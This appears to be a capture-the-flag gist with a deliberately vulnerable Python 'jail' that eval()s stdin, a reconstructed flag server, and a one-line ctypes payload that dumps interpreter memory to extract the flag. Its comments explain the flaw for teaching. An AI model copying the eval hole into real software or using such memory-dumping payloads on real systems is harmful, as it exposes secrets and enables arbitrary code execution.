@tyrion
Last active August 29, 2015 14:10
fuckpyjails
#!/usr/bin/env python
import sys
import socket
import resource
# Set both the soft and the hard RLIMIT_NPROC limit to 0 so that this process
# can no longer create new processes (fork is refused for an unprivileged
# user once the limit is reached).
# NOTE(review): this limits process creation only. It does not restrict what
# an evaluated expression can do inside this process (imports, ctypes, file
# and socket access), so it is not a sandbox on its own.
resource.setrlimit(resource.RLIMIT_NPROC, (0, 0))
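def get_key():
    """Fetch up to 64 bytes from the key server's Unix socket.

    Connects to the stream socket at /tmp/keyserver, performs a single
    recv(64) and returns whatever that one call produced. The result may be
    shorter than 64 bytes, or empty if the peer closed without sending.

    Raises:
        socket.error: if connecting or reading fails.
    """
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.connect("/tmp/keyserver")
        return s.recv(64)
    finally:
        # Release the descriptor even when connect() or recv() raises.
        s.close()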
# Print the prompt and flush so it appears before the blocking read.
sys.stdout.write(">>> ")
sys.stdout.flush()
# SECURITY: eval() runs one line of untrusted stdin as a Python expression
# with the whole interpreter reachable (__import__, ctypes, ...). This is the
# deliberate weakness of the challenge; never use this pattern on real input.
# get_key() is the left operand, so it is called before eval() and the key
# string is already in this process's memory while the expression runs.
# `is` compares object identity, not contents: an equal string built by the
# expression is normally a different object and still reaches "Fail!".
if get_key() is eval(raw_input()):
    print "Did you get the key?"
else:
    print "Fail!"
#!/usr/bin/env python
# Note: this is not the original server of the challenge.
# I wrote this trying to guess how the original might have been
import os
import struct
from socket import socket, AF_UNIX, SOCK_STREAM, SOL_SOCKET
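# Linux socket option number used to query the peer's credentials.
# NOTE(review): 17 is the asm-generic value; the number is
# architecture-specific, so confirm it for the platform this runs on.
SO_PEERCRED = 17 # Pulled from /usr/include/asm-generic/socket.h
# Path of the listening Unix socket. /tmp is shared between local users, so
# the name can be pre-created by someone else before this script starts.
SOCKFILE = '/tmp/keyserver'
# Challenge flag handed out by the accept loop.
FLAG = '9447{seriously_eval_is_lame}'

# Remove a stale socket left by a previous run. Attempting the removal and
# inspecting the failure avoids the check-then-remove race of testing
# os.path.exists() first; the error is re-raised only when something is still
# present at the path (for example an entry this user may not delete).
try:
    os.remove(SOCKFILE)
except OSError:
    if os.path.lexists(SOCKFILE):
        raise

# PIDs that have already been served once.
seen_pids = set()

s = socket(AF_UNIX, SOCK_STREAM)
# NOTE(review): bind() creates the socket file with umask-derived permissions;
# confirm they limit who is able to connect.
s.bind(SOCKFILE)
#s.setblocking(0)
s.listen(1)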
def get_pid(conn):
    """Return the peer PID reported by SO_PEERCRED for *conn*.

    The option value is read as three native ints (pid, uid, gid); only the
    first is returned and the uid and gid are discarded.

    NOTE(review): a PID names a process only while that process is alive and
    the kernel reuses PIDs, so treat the value as an identifier rather than
    as proof of who the client is.
    """
    # See: http://stackoverflow.com/a/7982749/641317
    ucred_layout = '3i'
    raw_creds = conn.getsockopt(
        SOL_SOCKET, SO_PEERCRED, struct.calcsize(ucred_layout))
    return struct.unpack(ucred_layout, raw_creds)[0]
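# Accept loop: serve one client at a time, forever. A peer PID that has not
# been seen before receives FLAG; any later connection from the same PID gets
# the refusal message instead.
# NOTE(review): the one-time rule is keyed on the PID alone, so it holds only
# while a client cannot obtain a second PID; seen_pids is never pruned.
while True:
    conn, addr = s.accept()
    try:
        # Errors from get_pid() still propagate, as in the original loop.
        pid = get_pid(conn)
        if pid in seen_pids:
            message = 'I already sent you the key, stupid!'
        else:
            seen_pids.add(pid)
            message = FLAG
        try:
            # sendall() retries until the whole message is written, whereas
            # send() may stop after a partial write.
            conn.sendall(message)
        except Exception as e:
            # Best effort: a client that went away must not stop the server.
            print(pid, e)
    finally:
        # Close every accepted connection explicitly instead of leaving the
        # descriptor open until the name is rebound.
        conn.close()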
# Write-up solution, kept here to show why eval() on untrusted input is not
# contained by the RLIMIT_NPROC limit in fuckpyjails.py.
# The expression is piped to the jail's stdin. It imports ctypes, loads libc
# and calls write() on fd 1 with a pointer computed from id('hello'), copying
# 100 MiB of the interpreter's own memory to stdout; no new process is needed.
# strings | grep 9447 then filters that output for the flag prefix.
# Defensive takeaway: a secret held in the same process that evaluates
# untrusted code is readable by that code; keep the secret in a separate
# process and never eval() untrusted input.
echo "(lambda c: (lambda libc: libc.write(1, c.c_char_p(id('hello') - 100024), 1024*1024*100))(c.cdll.LoadLibrary('libc.so.6')))(__import__('ctypes'))
" | python fuckpyjails.py | strings | grep 9447